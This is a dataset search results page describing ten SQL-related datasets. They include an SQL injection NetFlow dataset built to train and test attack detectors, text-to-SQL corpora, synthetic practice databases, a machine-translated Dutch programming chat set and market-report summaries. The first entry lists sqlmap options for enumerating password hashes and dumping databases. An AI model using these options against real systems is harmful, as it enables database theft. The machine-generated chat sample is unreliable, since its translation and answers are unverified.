41 datasets found
  1. Data from: SQL Injection Attack Netflow

    • data.niaid.nih.gov
    • portalcienciaytecnologia.jcyl.es
    • +3 more
    Updated Sep 28, 2022
    + more versions
    Cite
    Ignacio Crespo; Adrián Campazas (2022). SQL Injection Attack Netflow [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_6907251
    Explore at:
    Dataset updated
    Sep 28, 2022
    Authors
    Ignacio Crespo; Adrián Campazas
    License

    Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Introduction

    This dataset contains SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are union-query SQL injection and blind SQL injection. The SQLMAP tool was used to perform the attacks.

    NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

    Datasets

    The first dataset was collected to train the detection models (D1); the other was collected using different attacks than those used in training, to test the models and ensure their generalization (D2).

    The datasets contain both benign and malicious traffic. All collected datasets are balanced.

    The version of NetFlow used to build the datasets is 5.
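As a sketch of what a NetFlow v5 export looks like on the wire, the fixed 24-byte packet header can be parsed with Python's struct module. This is an illustrative parser following Cisco's published v5 field layout, not part of DOROTHEA:

```python
import struct

# NetFlow v5 export packets begin with a fixed 24-byte header,
# followed by up to 30 fixed-size 48-byte flow records.
V5_HEADER = struct.Struct("!HHIIIIBBH")  # network byte order

def parse_v5_header(datagram: bytes) -> dict:
    """Parse the 24-byte NetFlow v5 header from a raw UDP payload."""
    (version, count, sys_uptime, unix_secs, _unix_nsecs,
     flow_sequence, _engine_type, _engine_id, _sampling) = V5_HEADER.unpack_from(datagram)
    if version != 5:
        raise ValueError(f"expected NetFlow v5, got version {version}")
    return {"version": version, "count": count,
            "sys_uptime_ms": sys_uptime, "unix_secs": unix_secs,
            "flow_sequence": flow_sequence}
```

The `count` field tells a collector how many 48-byte flow records follow the header in the same datagram.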

    | Dataset | Aim | Samples | Benign-malicious traffic ratio |
    |---------|-----|---------|--------------------------------|
    | D1 | Training | 400,003 | 50% |
    | D2 | Test | 57,239 | 50% |

    Infrastructure and implementation

    Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection that builds interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator with the ipt_netflow sensor installed. The sensor is a Linux kernel module that uses Iptables to process the packets and convert them into NetFlow flows.

    DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or after it has been active for 1,800 seconds (30 minutes).
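The two-timeout export rule can be sketched as follows (illustrative logic only, not DOROTHEA's implementation):

```python
INACTIVE_TIMEOUT = 15    # seconds since the flow's last packet
ACTIVE_TIMEOUT = 1800    # seconds since the flow's first packet

def should_export(first_seen: float, last_seen: float, now: float) -> bool:
    """Return True when a flow must be exported under the two-timeout rule."""
    inactive_expired = now - last_seen >= INACTIVE_TIMEOUT
    active_expired = now - first_seen >= ACTIVE_TIMEOUT
    return inactive_expired or active_expired
```

The inactive timeout flushes short-lived flows quickly, while the active timeout caps how long a long-running flow can stay in the exporter's cache.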

    Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts; users may customize them or incorporate their own. The network traffic is managed by a gateway that performs two main tasks: it routes packets to the Internet, and it sends traffic to a NetFlow data generation node (packets received from the Internet are handled the same way).

    The malicious traffic collected (SQLIA attacks) was generated using SQLMAP, a penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities.

    The attacks were executed from 16 nodes, each launching SQLMAP with the parameters in the following table.

    | Parameters | Description |
    |------------|-------------|
    | --banner, --current-user, --current-db, --hostname, --is-dba, --users, --passwords, --privileges, --roles, --dbs, --tables, --columns, --schema, --count, --dump, --comments | Enumerate users, password hashes, privileges, roles, databases, tables and columns |
    | --level=5 | Increase the probability of a false positive identification |
    | --risk=3 | Increase the probability of extracting data |
    | --random-agent | Select the User-Agent randomly |
    | --batch | Never ask for user input, use the default behavior |
    | --answers="follow=Y" | Predefined answers to yes |
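A sqlmap invocation combining these parameters might be assembled as sketched below. The target URL is hypothetical; the flags are taken from the table above:

```python
import shlex

# Hypothetical victim URL used only for illustration.
TARGET = "http://192.0.2.10/vulnerable/form.php?id=1"

# Enumeration flags from the table above.
ENUM_FLAGS = ["--banner", "--current-user", "--current-db", "--hostname",
              "--is-dba", "--users", "--passwords", "--privileges", "--roles",
              "--dbs", "--tables", "--columns", "--schema", "--count",
              "--dump", "--comments"]

cmd = ["sqlmap", "-u", TARGET, "--level=5", "--risk=3", "--random-agent",
       "--batch", "--answers=follow=Y"] + ENUM_FLAGS
print(shlex.join(cmd))
```

`--batch` and `--answers` keep the run unattended, which matters when the same command is launched from 16 nodes in parallel.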

    Every node executed SQLIA on 200 victim nodes. The victim nodes deployed a web form vulnerable to Union-type injection attacks, connected to either a MySQL or a SQLServer database engine (50% of the victim nodes deployed MySQL and the other 50% SQLServer).
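The difference between the vulnerable form and a safe one can be illustrated with a minimal sqlite3 sketch (sqlite3 stands in for the MySQL/SQLServer engines used in the dataset; table names and payload are invented):

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE products (id INTEGER, name TEXT)")
con.execute("CREATE TABLE users (login TEXT, pw_hash TEXT)")
con.execute("INSERT INTO products VALUES (1, 'widget')")
con.execute("INSERT INTO users VALUES ('admin', '5f4dcc3b')")

# A union-type payload appended to a numeric parameter.
payload = "1 UNION ALL SELECT login, pw_hash FROM users"

# Vulnerable: attacker input concatenated straight into the statement,
# so the users table leaks alongside the legitimate product row.
leaked = con.execute(
    f"SELECT id, name FROM products WHERE id = {payload}").fetchall()

# Safe: the same input bound as a parameter matches no product id.
safe = con.execute(
    "SELECT id, name FROM products WHERE id = ?", (payload,)).fetchall()
```

Parameter binding is what the victim forms in this dataset deliberately lack.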

    The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.

    However, for D2, blind SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks also differed from those of D1: in D2, the address space was 152.148.48.1/24 for benign and malicious traffic-generating nodes and 140.30.20.1/24 for victim nodes.

    For the MySQL server, MariaDB version 10.4.12 was used; Microsoft SQL Server 2017 Express and PostgreSQL version 13 served the other victim nodes.

  2. SQL-GENERATOR-DATASETS

    • huggingface.co
    Updated Dec 2, 2024
    Cite
    FRANKLIN (2024). SQL-GENERATOR-DATASETS [Dataset]. https://huggingface.co/datasets/fknguedia/SQL-GENERATOR-DATASETS
    Explore at:
    Dataset updated
    Dec 2, 2024
    Authors
    FRANKLIN
    License

    Other: https://choosealicense.com/licenses/other/

    Description

    View the code: https://colab.research.google.com/drive/1rLk-mdsWsdxwQdYYJS24rAP9KABtbiqu?usp=sharing

      Example:

        {"messages": [
          {"role": "system", "content": "You are a SQL expert assistant. Generate clear, efficient SQL queries based on user requests. Provide only the SQL query without any additional text or explanation."},
          {"role": "user", "content": "What are the top 5 most popular genres of music in the database, based on the number of tracks… See the full description on the dataset page: https://huggingface.co/datasets/fknguedia/SQL-GENERATOR-DATASETS.
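Records of this shape can be parsed with the standard json module. The sketch below assumes a third assistant turn holding the generated SQL, which the truncated excerpt does not show; the contents are invented for illustration:

```python
import json

# One record in the chat-messages format shown above; the assistant
# turn is an assumption, since the excerpt is cut off before the answer.
record = json.loads("""{"messages": [
  {"role": "system", "content": "You are a SQL expert assistant."},
  {"role": "user", "content": "What are the top 5 most popular genres of music?"},
  {"role": "assistant", "content": "SELECT genre FROM tracks GROUP BY genre ORDER BY COUNT(*) DESC LIMIT 5;"}
]}""")

roles = [m["role"] for m in record["messages"]]
sql = next(m["content"] for m in record["messages"]
           if m["role"] == "assistant")
```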
    
  3. Bike Warehouse SQL Project

    • kaggle.com
    Updated Jan 13, 2025
    Cite
    Safae Ahb (2025). Bike Warehouse SQL Project [Dataset]. https://www.kaggle.com/datasets/safaeahb/bike-warehouse-sql-project
    Explore at:
    Croissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
    Dataset updated
    Jan 13, 2025
    Dataset provided by
    Kaggle: http://kaggle.com/
    Authors
    Safae Ahb
    License

    Apache License, v2.0: https://www.apache.org/licenses/LICENSE-2.0
    License information was derived automatically

    Description

    SAP Bikes Sales : SQL Project

    This project involves analyzing and transforming data from a bike warehouse database using SQL. The goal is to clean, transform, and query the data to generate insights about products, employees, customers, sales, and trends.

    Overview

    The SAP Bikes Sales database contains various tables that represent business data for a bike warehouse, such as information on products, sales, employees, business partners, and more. This project focuses on cleaning and transforming data, optimizing database schema, and generating SQL queries to gain business insights.

    Key SQL Operations:

    1. **Data Cleaning & Transformation**:
       - Remove duplicate records from key tables.
       - Drop unnecessary columns and handle null values.
       - Populate new columns based on existing data.
       - Merge related tables to create new insights.
    2. **Business Insights Queries**:
       - Top-selling Products: Identify products with the highest sales quantities and total revenue.
       - Sales Performance by Product Category: Analyze revenue and order counts by product category.
       - Employee Sales Performance: Track employees' contribution to sales volumes and revenue.
       - Customer Segmentation: Examine the number of orders placed by business partners and their total sales value.
       - Sales Trends: Analyze sales trends over time and calculate average order values.

    Tables Involved

    • Addresses: Contains information about addresses
    • BusinessPartners: Contains details about business partners
    • Employees: Contains employee information
    • ProductCategories & ProductCategoryText: Describe product categories and their descriptions
    • Products & ProductTexts: Contain product details and product descriptions
    • SalesOrderItems: Contains details of individual items within a sales order
    • SalesOrders: Contains information about sales orders

    Key SQL Queries

    1. Data Cleaning and Transformation:

    - **Addresses Table**: Checked for duplicate ADDRESSID values.
    - **BusinessPartners Table**: Handled duplicates and missing or incorrect data; dropped the FAXNUMBER column because it was empty.
    - **Employees Table**: Dropped unnecessary columns; populated NAME_INITIALS from employees' first, middle, and last name initials; fixed column type issues.
    - **Product Categories and Product Texts**: Merged the ProductCategories and ProductCategoryText tables into a new CombinedProductCategories table for easier analysis.
    - **Products Table**: Dropped irrelevant columns such as WIDTH, DEPTH, HEIGHT, etc.
    - **Sales Order Items Table**: Fixed null values in GROSSAMOUNT and created a TOTALGROSSAMOUNT column to track sales volume.
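Two of the operations above (populating NAME_INITIALS and checking a key column for duplicates) can be sketched in SQL via Python's sqlite3. The engine and sample rows are assumptions; table and column names follow the description:

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("""CREATE TABLE Employees (
    EMPLOYEEID INTEGER, NAME_FIRST TEXT, NAME_MIDDLE TEXT,
    NAME_LAST TEXT, NAME_INITIALS TEXT)""")
con.executemany("INSERT INTO Employees VALUES (?, ?, ?, ?, NULL)",
                [(1, "Ada", "M", "Lovelace"), (2, "Edgar", None, "Codd")])

# Populate NAME_INITIALS from first/middle/last names (middle may be NULL).
con.execute("""UPDATE Employees SET NAME_INITIALS =
    substr(NAME_FIRST, 1, 1)
    || coalesce(substr(NAME_MIDDLE, 1, 1), '')
    || substr(NAME_LAST, 1, 1)""")
initials = [r[0] for r in con.execute(
    "SELECT NAME_INITIALS FROM Employees ORDER BY EMPLOYEEID")]

# Duplicate check on a key column, as done for ADDRESSID in Addresses.
dups = con.execute("""SELECT EMPLOYEEID, COUNT(*) FROM Employees
    GROUP BY EMPLOYEEID HAVING COUNT(*) > 1""").fetchall()
```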

    2. Database Diagram and Relationships

    In addition to the data cleaning and analysis, a database diagram has been create...

  4. ⚙️ SQL Tutorial Exercise Data

    • kaggle.com
    zip
    Updated Oct 2, 2023
    Cite
    mexwell (2023). ⚙️ SQL Tutorial Exercise Data [Dataset]. https://www.kaggle.com/datasets/mexwell/sql-tutorial-exercise-data
    Explore at:
    zip (3701453 bytes). Available download formats
    Dataset updated
    Oct 2, 2023
    Authors
    mexwell
    Description

    This dataset was created to be the basis of the data.world SQL tutorial exercises. Data was generated using Synthea, a synthetic patient generator that models the medical history of synthetic patients. Their mission is to output high-quality synthetic, realistic but not real, patient data and associated health records covering every aspect of healthcare. The resulting data is free from cost, privacy, and security restrictions, enabling research with Health IT data that is otherwise legally or practically unavailable. De-identified real data still presents a challenge in the medical field because there are people who excel at re-identification of these data. For that reason the average medical center will not share its patient data. Most governmental data is at the hospital level; NHANES data is an exception.

    You can read Synthea's first academic paper here.

    Acknowledgement

    Photo by Rubaitul Azad on Unsplash

  5. Stack Overflow Chat Dutch

    • data.niaid.nih.gov
    Updated Jun 20, 2023
    + more versions
    Cite
    Vanroy, Bram (2023). Stack Overflow Chat Dutch [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_8052379
    Explore at:
    Dataset updated
    Jun 20, 2023
    Authors
    Vanroy, Bram
    License

    Apache License 2.0: http://www.apache.org/licenses/LICENSE-2.0

    Description

    This dataset contains 56,964 machine-generated conversations between an AI assistant and a (fake) "Human" in Dutch, specifically in the domain of programming (Stack Overflow). They are translations of Baize's machine-generated answers to the Stack Overflow dataset.

    Data Instances

    {'id': 9,
     'input': 'Het gesprek tussen de mens en de AI-assistent.
       [|Human|] Ik heb wat hulp nodig met Spark SQL union en het ordenen van kolommen.
       [|AI|] Natuurlijk, ik help je graag. Waar heb je specifiek hulp bij nodig?
       [|Human|] Ik wil de output van een UNION-query ordenen op een kolom die niet aanwezig is in de SELECT-instructie. Is dat mogelijk?
       [|AI|] Ja, het is mogelijk met Spark SQL. Je kunt de ordinale positie van de kolom in de ORDER BY-clausule gebruiken in plaats van de kolomnaam. Als je bijvoorbeeld wilt ordenen op de derde kolom in de SELECT-instructie, kun je ORDER BY 3 gebruiken.
       [|Human|] Dat is nuttig. Kan ik ook een alias gebruiken in de ORDER BY-clausule?
       [|AI|] Ja, je kunt een alias gebruiken in de ORDER BY-clausule. De alias moet worden gedefinieerd in de SELECT-instructie. Als je bijvoorbeeld de derde kolom als "col3" alias geeft, kun je ordenen met ORDER BY col3.
       [|Human|] Oké, ik denk dat ik het begrijp. Kan ik dezelfde alias gebruiken voor kolommen uit beide tabellen in de UNION?
       [|AI|] Nee, je kunt dezelfde alias niet gebruiken voor kolommen uit beide tabellen in de UNION. Elke tabel in de UNION moet een unieke alias hebben voor de kolommen.
       [|Human|] ',
     'topic': 'Spark SQL UNION - ORDER BY kolom niet in SELECT'}

    Data Fields

    id: the ID of the item. The following 82 IDs are not included because they could not be translated: [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992]

    input: the machine-generated conversation between AI and "Human". Always starts with Het gesprek tussen de mens en de AI-assistent. and has at least one occurrence of both [|AI|] and [|Human|].

    topic: the topic description
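The documented invariants of the input field (the fixed prefix and at least one occurrence of each speaker marker) can be checked with a short validation sketch:

```python
PREFIX = "Het gesprek tussen de mens en de AI-assistent."

def is_valid(record: dict) -> bool:
    """Check the documented invariants of the `input` field."""
    text = record["input"]
    return (text.startswith(PREFIX)
            and "[|AI|]" in text
            and "[|Human|]" in text)
```

A filter of this kind is presumably how the 82 failed translations (missing one of the markers) were identified.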

    Dataset Creation

    Both the conversations and the topics were translated with OpenAI's API for gpt-3.5-turbo, with max_tokens=1024 and temperature=0 as parameters.

    The prompt template to translate the input is (where src_lang was English and tgt_lang Dutch):

    CONVERSATION_TRANSLATION_PROMPT = """You are asked to translate a conversation between an AI assistant and a human from {src_lang} into {tgt_lang}.

    Here are the requirements that you should adhere to:
    1. maintain the format: the conversation consists of the AI (marked as [|AI|]) and the human ([|Human|]) talking in turns and responding to each other;
    2. do not translate the speaker identifiers [|AI|] and [|Human|] but always copy them into the translation in appropriate places;
    3. ensure accurate translation and keep the correctness of the conversation;
    4. make sure that text is fluent to read and does not contain grammatical errors. Use standard {tgt_lang} without regional bias;
    5. translate the human's text using informal, but standard, language;
    6. make sure to avoid biases (such as gender bias, grammatical bias, social bias);
    7. if the human asks to correct grammar mistakes or spelling mistakes then you have to generate a similar mistake in {tgt_lang}, and then also generate a corrected output version for the AI in {tgt_lang};
    8. if the human asks to translate text from one to another language, then you only translate the human's question to {tgt_lang} but you keep the translation that the AI provides in the language that the human requested;
    9. do not translate code fragments but copy them as they are. If there are English examples, variable names or definitions in code fragments, keep them in English.

    Now translate the following conversation with the requirements set out above. Do not provide an explanation and do not add anything else.

    """

    The prompt to translate the topic is:

    TOPIC_TRANSLATION_PROMPT = (
        "Translate the following title of a conversation from {src_lang} to {tgt_lang} in a succinct,"
        " summarizing manner. Translate accurately and formally. Do not provide any explanation"
        " about the translation and do not include the original title.\n\n"
    )

    The system message was:

    You are a helpful assistant that translates English to Dutch to the requirements that are given to you.
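The system message and prompt template plausibly combine into a chat-completion request as sketched below. The payload shape and helper are assumptions for illustration; only the model name and parameters stated above come from the source, and the template is abbreviated here:

```python
SYSTEM_MESSAGE = ("You are a helpful assistant that translates English to Dutch "
                  "to the requirements that are given to you.")

# Abbreviated; the full template is listed above.
CONVERSATION_TRANSLATION_PROMPT = (
    "You are asked to translate a conversation between an AI assistant and a "
    "human from {src_lang} into {tgt_lang}.\n\n..."
)

def build_request(conversation: str, src_lang: str = "English",
                  tgt_lang: str = "Dutch") -> dict:
    """Assemble a chat-completion payload with the stated parameters."""
    prompt = CONVERSATION_TRANSLATION_PROMPT.format(src_lang=src_lang,
                                                    tgt_lang=tgt_lang)
    return {"model": "gpt-3.5-turbo", "max_tokens": 1024, "temperature": 0,
            "messages": [{"role": "system", "content": SYSTEM_MESSAGE},
                         {"role": "user", "content": prompt + "\n" + conversation}]}
```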

    Note that 82 items (0.1%) were not successfully translated: the translation was missing the AI identifier [|AI|] and/or the human one [|Human|]. The IDs of these items are the ones listed in the id field description above.

    The translation quality has not been verified. Use at your own risk!

    Licensing Information

    Licensing info for Stack Overflow Questions is listed as Apache 2.0. If you use the current dataset, you should also adhere to the original license.

    This text was generated (either in part or in full) with GPT-3 (gpt-3.5-turbo), OpenAI’s large-scale language-generation model. Upon generating draft language, the author reviewed, edited, and revised the language to their own liking and takes ultimate responsibility for the content of this publication.

    If you use this dataset, you must also follow the Sharing and Usage policies.

    As clearly stated in their Terms of Use, specifically 2c.iii, "[you may not] use output from the Services to develop models that compete with OpenAI". That means that you cannot use this dataset to build models that are intended to commercially compete with OpenAI. As far as I am aware, that is a specific restriction that should serve as an addendum to the current license.

    This dataset is also available on the Hugging Face hub with the same DOI and license. See that README for more info.

  6. Database Testing Tool Report

    • archivemarketresearch.com
    doc, pdf, ppt
    Updated Feb 9, 2025
    Cite
    Archive Market Research (2025). Database Testing Tool Report [Dataset]. https://www.archivemarketresearch.com/reports/database-testing-tool-26309
    Explore at:
    pdf, ppt, doc. Available download formats
    Dataset updated
    Feb 9, 2025
    Dataset authored and provided by
    Archive Market Research
    License

    https://www.archivemarketresearch.com/privacy-policy

    Time period covered
    2025 - 2033
    Area covered
    Global
    Variables measured
    Market Size
    Description

    The global database testing tool market is anticipated to experience substantial growth in the coming years, driven by factors such as the increasing adoption of cloud-based technologies, the rising demand for data quality and accuracy, and the growing complexity of database systems. The market is expected to reach a value of USD 1,542.4 million by 2033, expanding at a CAGR of 7.5% during the forecast period of 2023-2033. Key players in the market include Apache JMeter, DbFit, SQLMap, Mockup Data, SQL Test, NoSQLUnit, Orion, ApexSQL, QuerySurge, DBUnit, DataFactory, DTM Data Generator, Oracle, SeLite, SLOB, and others. The North American region is anticipated to hold a significant share of the database testing tool market, followed by Europe and Asia Pacific. The increasing adoption of cloud-based database testing services, the presence of key market players, and the growing demand for data testing and validation are driving the market growth in North America. Asia Pacific, on the other hand, is expected to experience the highest growth rate due to the rapidly increasing IT spending, the emergence of new technologies, and the growing number of businesses investing in data quality management solutions.

  7. WikiSQL (Questions and SQL Queries)

    • kaggle.com
    zip
    Updated Nov 25, 2022
    Cite
    The Devastator (2022). WikiSQL (Questions and SQL Queries) [Dataset]. https://www.kaggle.com/datasets/thedevastator/dataset-for-developing-natural-language-interfac
    Explore at:
    zip (21491264 bytes). Available download formats
    Dataset updated
    Nov 25, 2022
    Authors
    The Devastator
    License

    https://creativecommons.org/publicdomain/zero/1.0/

    Description

    WikiSQL (Questions and SQL Queries)

    80654 hand-annotated questions and SQL queries on 24241 Wikipedia tables

    By Huggingface Hub [source]

    About this dataset

    A large crowd-sourced dataset for developing natural language interfaces for relational databases. WikiSQL is a dataset of 80654 hand-annotated examples of questions and SQL queries distributed across 24241 tables from Wikipedia.

    How to use the dataset

    This dataset can be used to develop natural language interfaces for relational databases. The data fields are the same among all splits; each file records the phase, question, table, and SQL query for each example.

    Research Ideas

    • This dataset can be used to develop natural language interfaces for relational databases.
    • This dataset can be used to develop a knowledge base of common SQL queries.
    • This dataset can be used to generate a training set for a neural network that translates natural language into SQL queries

    Acknowledgements

    If you use this dataset in your research, please credit the original authors.

    Data Source

    License

    License: CC0 1.0 Universal (CC0 1.0) - Public Domain Dedication No Copyright - You can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information.

    Columns

    The files validation.csv, train.csv, and test.csv share the same columns:

    | Column name | Description |
    |:------------|:------------|
    | phase | The phase of the data collection. (String) |
    | question | The question asked by the user. (String) |
    | table | The table containing the data for the question. (String) |
    | sql | The SQL query corresponding to the question. (String) |
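Rows of the described shape can be read with the standard csv module; the sample row below is invented for illustration:

```python
import csv
import io

# A miniature stand-in for validation.csv; the row itself is invented.
sample = io.StringIO(
    "phase,question,table,sql\n"
    '1,"How many rows does the table have?",1-1000181-1,'
    '"SELECT COUNT(*) FROM table"\n'
)

rows = list(csv.DictReader(sample))
```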

    Acknowledgements

    If you use this dataset in your research, please credit the original authors and Huggingface Hub.

  8. synthetic_text_to_sql

    • huggingface.co
    Cite
    Gretel.ai, synthetic_text_to_sql [Dataset]. https://huggingface.co/datasets/gretelai/synthetic_text_to_sql
    Explore at:
    Croissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
    Dataset provided by
    Gretel.ai
    License

    Apache License, v2.0: https://www.apache.org/licenses/LICENSE-2.0
    License information was derived automatically

    Description

    Image generated by DALL-E. See prompt for more details


    gretelai/synthetic_text_to_sql is a rich dataset of high quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:

    • 105,851 records partitioned into 100,000 train and 5,851 test records
    • ~23M total tokens, including ~12M SQL tokens
    • Coverage across 100 distinct… See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.

  9. Synthetic E-Commerce Relational Datasets

    • kaggle.com
    Updated Aug 31, 2025
    Cite
    Nael Aqel (2025). Synthetic E-Commerce Relational Datasets [Dataset]. https://www.kaggle.com/datasets/naelaqel/synthetic-e-commerce-relational-dataset
    Explore at:
    Croissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
    Dataset updated
    Aug 31, 2025
    Dataset provided by
    Kaggle: http://kaggle.com/
    Authors
    Nael Aqel
    License

    MIT License: https://opensource.org/licenses/MIT
    License information was derived automatically

    Description

    Synthetic E-Commerce Relational Dataset

    This dataset is synthetically generated fake data designed to simulate a realistic e-commerce environment.

    Purpose

    To provide large-scale relational datasets for practicing database operations, analytics, and testing tools like DuckDB, Pandas, and SQL engines. Ideal for benchmarking, educational projects, and data engineering experiments.

    Entity Relationship Diagram (ERD) - Tables Overview

    1. Customers

    • customer_id (int): Unique identifier for each customer
    • name (string): Customer full name
    • email (string): Customer email address
    • gender (string): Customer gender ('Male', 'Female', 'Other')
    • signup_date (date): Date customer signed up
    • country (string): Customer country of residence

    2. Products

    • product_id (int): Unique identifier for each product
    • product_name (string): Name of the product
    • category (string): Product category (e.g., Electronics, Books)
    • price (float): Price per unit
    • stock_quantity (int): Available stock count
    • brand (string): Product brand name

    3. Orders

    • order_id (int): Unique identifier for each order
    • customer_id (int): ID of the customer who placed the order (foreign key to Customers)
    • order_date (date): Date when order was placed
    • total_amount (float): Total amount for the order
    • payment_method (string): Payment method used (Credit Card, PayPal, etc.)
    • shipping_country (string): Country where the order is shipped

    4. Order Items

    • order_item_id (int): Unique identifier for each order item
    • order_id (int): ID of the order this item belongs to (foreign key to Orders)
    • product_id (int): ID of the product ordered (foreign key to Products)
    • quantity (int): Number of units ordered
    • unit_price (float): Price per unit at order time

    5. Product Reviews

    • review_id (int): Unique identifier for each review
    • product_id (int): ID of the reviewed product (foreign key to Products)
    • customer_id (int): ID of the customer who wrote the review (foreign key to Customers)
    • rating (int): Rating score (1 to 5)
    • review_text (string): Text content of the review
    • review_date (date): Date the review was written

    Visual ERD


    Notes

    • All data is randomly generated using Python’s Faker library, so it does not reflect any real individuals or companies.
    • The data is provided in both CSV and Parquet formats.
    • The generator script is available in the accompanying GitHub repository for reproducibility and customization.
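A miniature version of such generation, with a referential-integrity check across the tables above, can be sketched with the standard library (the real dataset used Faker; field names follow the schema above, values are invented):

```python
import random

random.seed(0)  # reproducible toy data

# Tiny stand-ins for the Customers and Orders tables.
customers = [{"customer_id": i, "country": random.choice(["US", "NL", "JO"])}
             for i in range(1, 6)]
orders = [{"order_id": i,
           "customer_id": random.choice(customers)["customer_id"]}
          for i in range(1, 11)]

# Every order must reference an existing customer (foreign-key integrity),
# which holds by construction here and should hold in the published data.
customer_ids = {c["customer_id"] for c in customers}
orphans = [o for o in orders if o["customer_id"] not in customer_ids]
```

The same check, scaled up, is a quick sanity test to run after loading the CSV or Parquet files into DuckDB or Pandas.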

    Output

    The script saves two folders inside the specified output path:

    csv/    # CSV files
    parquet/  # Parquet files
    

    License

    MIT License

  10. Data Access Auditing Market Research Report 2033

    • growthmarketreports.com
    csv, pdf, pptx
    Updated Sep 1, 2025
    Cite
    Growth Market Reports (2025). Data Access Auditing Market Research Report 2033 [Dataset]. https://growthmarketreports.com/report/data-access-auditing-market
    Explore at:
    pdf, pptx, csv. Available download formats
    Dataset updated
    Sep 1, 2025
    Dataset authored and provided by
    Growth Market Reports
    Time period covered
    2024 - 2032
    Area covered
    Global
    Description

    Data Access Auditing Market Outlook



    According to our latest research, the global Data Access Auditing market size in 2024 is valued at USD 2.18 billion, reflecting robust demand for advanced data governance and compliance solutions across diverse industries. The market is expected to grow at a CAGR of 13.7% from 2025 to 2033, reaching a forecasted value of USD 6.47 billion by 2033. This impressive growth is propelled by increasing regulatory requirements, heightened cybersecurity concerns, and the exponential rise in data generation and consumption worldwide. As per our latest research, organizations are prioritizing data transparency and security, further accelerating the adoption of data access auditing solutions globally.




    The primary growth factor for the Data Access Auditing market is the escalating regulatory landscape that mandates stringent data monitoring and access control. With the proliferation of data privacy laws such as the General Data Protection Regulation (GDPR), California Consumer Privacy Act (CCPA), and the Health Insurance Portability and Accountability Act (HIPAA), organizations across sectors are compelled to implement comprehensive auditing mechanisms. These regulations require enterprises to not only safeguard sensitive data but also maintain detailed logs of data access events for compliance and forensic analysis. Consequently, the need for automated, scalable, and real-time data access auditing solutions has surged, enabling organizations to mitigate risks, avoid hefty penalties, and foster trust among stakeholders.




    Another significant driver for the Data Access Auditing market is the dramatic increase in data breaches and cyberattacks targeting critical business information. As enterprises transition to hybrid and multi-cloud environments, the complexity of managing data access rights and monitoring user activities has intensified. Cybersecurity incidents, including insider threats and unauthorized data exfiltration, are pushing organizations to adopt sophisticated auditing tools capable of providing granular visibility into who accessed what data, when, and from where. These solutions not only help detect suspicious activities in real-time but also support incident response and post-breach investigations, thereby enhancing the overall security posture of organizations.




    The rapid digitization of business processes and the integration of emerging technologies such as artificial intelligence, machine learning, and the Internet of Things (IoT) are further fueling the growth of the Data Access Auditing market. Enterprises are generating and processing massive volumes of structured and unstructured data, necessitating robust auditing frameworks to ensure data integrity and prevent unauthorized access. The convergence of digital transformation initiatives with data-centric business models is compelling organizations to invest in advanced auditing solutions that offer scalability, automation, and seamless integration with existing IT infrastructures. This trend is particularly pronounced in sectors such as financial services, healthcare, and government, where data sensitivity and compliance obligations are paramount.



    In the context of increasing cybersecurity threats and regulatory demands, SQL Query Audit Tools have emerged as vital components in the arsenal of data access auditing solutions. These tools are designed to provide detailed insights into database activities by monitoring and logging SQL queries executed within an organization's database environment. By capturing comprehensive information about who executed a query, what data was accessed, and when the access occurred, SQL Query Audit Tools enable organizations to maintain stringent oversight over their data assets. This capability is crucial for detecting unauthorized access attempts, ensuring compliance with data protection regulations, and supporting forensic investigations in the event of a data breach. As organizations continue to grapple with complex data environments, the integration of SQL Query Audit Tools into broader data governance frameworks is becoming increasingly essential for maintaining robust security postures.
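As an illustration of the query-logging idea described above (not any particular vendor's product), SQLite's Python driver exposes a trace hook that can capture every statement executed on a connection; the "user" field below is a placeholder, since a real audit tool would take it from the session context:

```python
import datetime
import sqlite3

audit_log = []

def audit(statement):
    # Record who, what, and when for each executed statement.
    audit_log.append({
        "when": datetime.datetime.now(datetime.timezone.utc).isoformat(),
        "user": "app_user",  # placeholder; real tools resolve the session user
        "sql": statement,
    })

con = sqlite3.connect(":memory:")
con.set_trace_callback(audit)  # invoked for every SQL statement executed

con.execute("CREATE TABLE accounts (id INTEGER, balance REAL)")
con.execute("SELECT id, balance FROM accounts")

for entry in audit_log:
    print(entry["when"], entry["user"], entry["sql"])
```
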